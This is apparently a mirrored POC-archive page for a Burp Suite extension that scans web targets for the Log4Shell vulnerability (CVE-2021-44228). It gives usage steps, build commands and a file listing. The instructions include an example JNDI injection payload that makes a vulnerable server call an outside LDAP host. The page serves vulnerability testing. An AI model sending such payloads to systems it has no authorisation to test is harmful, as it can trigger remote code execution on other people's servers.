POC详情: b901cecf89d42656f89e983a24ccc66aab2453c0

来源
https://github.com/0xDexter0us/Log4J-Scanner
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.
介绍
<h1 align="center">
  <a href="https://github.com/0xDexter0us/Log4J-Scanner"><img src="https://raw.githubusercontent.com/0xDexter0us/Log4J-Scanner/main/images/log4j-scanner.png"  alt="log4j" width="450" align="middle" style="vertical-align:top"></a>
</h1>

<h4 align="center">Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability with custom payloads.</h4>

---

<p align="center">
  <a href="https://github.com/0xDexter0us/Log4J-Scanner/releases">
    <img src="https://img.shields.io/github/release/0xDexter0us/Log4J-Scanner.svg">
  </a>
  <a href="https://github.com/0xDexter0us/Log4J-Scanner/releases">
    <img src="https://img.shields.io/github/downloads/0xDexter0us/Log4J-Scanner/total?label=downloads&logo=github&color=inactive">
  </a>
  <a href="https://github.com/0xDexter0us/Log4J-Scanner/">
      <img src="https://img.shields.io/github/stars/0xDexter0us/Log4J-Scanner.svg?style=social&label=Stars">
  </a>
  <a href="https://github.com/0xDexter0us/Log4J-Scanner/">
    <img src="https://img.shields.io/github/followers/0xDexter0us.svg?style=social&label=Follow">
  </a>
  <a href="https://twitter.com/intent/follow?screen_name=0xDexter0us">
      <img src="https://img.shields.io/twitter/follow/0xDexter0us.svg?style=social&label=Follow">
  </a>
  <a href="https://discord.gg/bugbounty">
      <img src="https://img.shields.io/badge/chat-on%20discord-7289da.svg">
  </a>

</p>

---
## Disclaimer
> I am not responsible for your actions, burp-suite freezing, target getting hacked, thermonuclear war, or the current economic crisis caused by you following these directions. YOU are choosing to use this tool, and if you point your finger at me for messing anything up, I will LMAO at you.

---
![Usage Gif](https://raw.githubusercontent.com/0xDexter0us/Log4J-Scanner/main/images/useage.gif)

## Instructions:
 - Install the extension either from pre-compiled releases or build from source.
 - Disable/Uncheck all other active scanning extensions like active scan++, burp bounty pro, param-miner etc.
 - From Top-Menu open settings of Log4J Scanner.
 - Add your custom payload and save settings.
 - Select your target > right-click > Scan.
 - Select `Scan Configuration` > `Select from library`
 - Only select `Audit checks - extensions only` and hit OK button.

Special thanks to [Silent Signal](https://github.com/silentsignal), instructions and scan configurations are inspired from his extension.


### Important instructions to remember:
 - In your custom payload DO __NOT__ add your collaborator url, just add `[collaborator-server]` as a placeholder,
 - `[collaborator-server` will be replaced by your collaborator server url itself.
 - Example payload: `"${jndi:ldap://[collaborator-server]/a}`


## Download releases
`https://github.com/0xDexter0us/Log4J-Scanner/releases/`

## Build from source
* `./gradlew build fatJar`
* Grab the jar file `build/libs/Log4J-Scanner-x.x.x.jar`

## Installation
1. Download the latest jar from releases or build from source.
2. Add the jar to Burp Suite.



#### If you like the project, please give the repo a star! <3

## Resources

- For passive scanning: `https://github.com/f0ng/log4j2burpscanner`
- For active scanning: `https://github.com/albinowax/ActiveScanPlusPlus` & `https://github.com/silentsignal/burp-log4shell`


## Changelog
**25 December 2021 - v0.2.0**
 - Added Burp Collaborator api.
 - Removed custom scanner.
 - Added Burp scanner api.

**13 December 2021 - v0.1.0**
 - First public release

## Thanks To

* CoreyD97 - https://github.com/CoreyD97
* Silent Signal - https://github.com/silentsignal


### This was coded be me within a day and is an initial release, bug might occur, bug reports, suggestions and pull requests all are welcome :)

-----

[![Join our Discord server!](https://invidget.switchblade.xyz/bugbounty)](http://discord.gg/bugbounty)

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Q5Q76ZT6K)
文件快照

 [4.0K]  /data/pocs/b901cecf89d42656f89e983a24ccc66aab2453c0
├── [ 650]  build.gradle
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 58K]  gradle-wrapper.jar
│       └── [ 200]  gradle-wrapper.properties
├── [  26]  gradle.properties
├── [5.6K]  gradlew
├── [2.7K]  gradlew.bat
├── [4.0K]  images
│   ├── [4.9K]  log4j-scanner.png
│   └── [ 14M]  useage.gif
├── [ 34K]  LICENSE
├── [3.8K]  README.md
├── [  36]  settings.gradle
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  kotlin
        │   ├── [4.0K]  burp
        │   │   └── [ 117]  BurpExtender.kt
        │   └── [4.0K]  com
        │       └── [4.0K]  dexter0us
        │           └── [4.0K]  log4jScanner
        │               ├── [1.9K]  Extension.kt
        │               ├── [ 607]  Globals.kt
        │               ├── [2.5K]  Log4JScanner.kt
        │               └── [7.0K]  Log4JUI.kt
        └── [4.0K]  resources
            ├── [547K]  blog.png
            ├── [ 68K]  github.png
            ├── [109K]  htp.png
            ├── [ 50K]  ko-fi.png
            └── [135K]  twitter.png

11 directories, 21 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。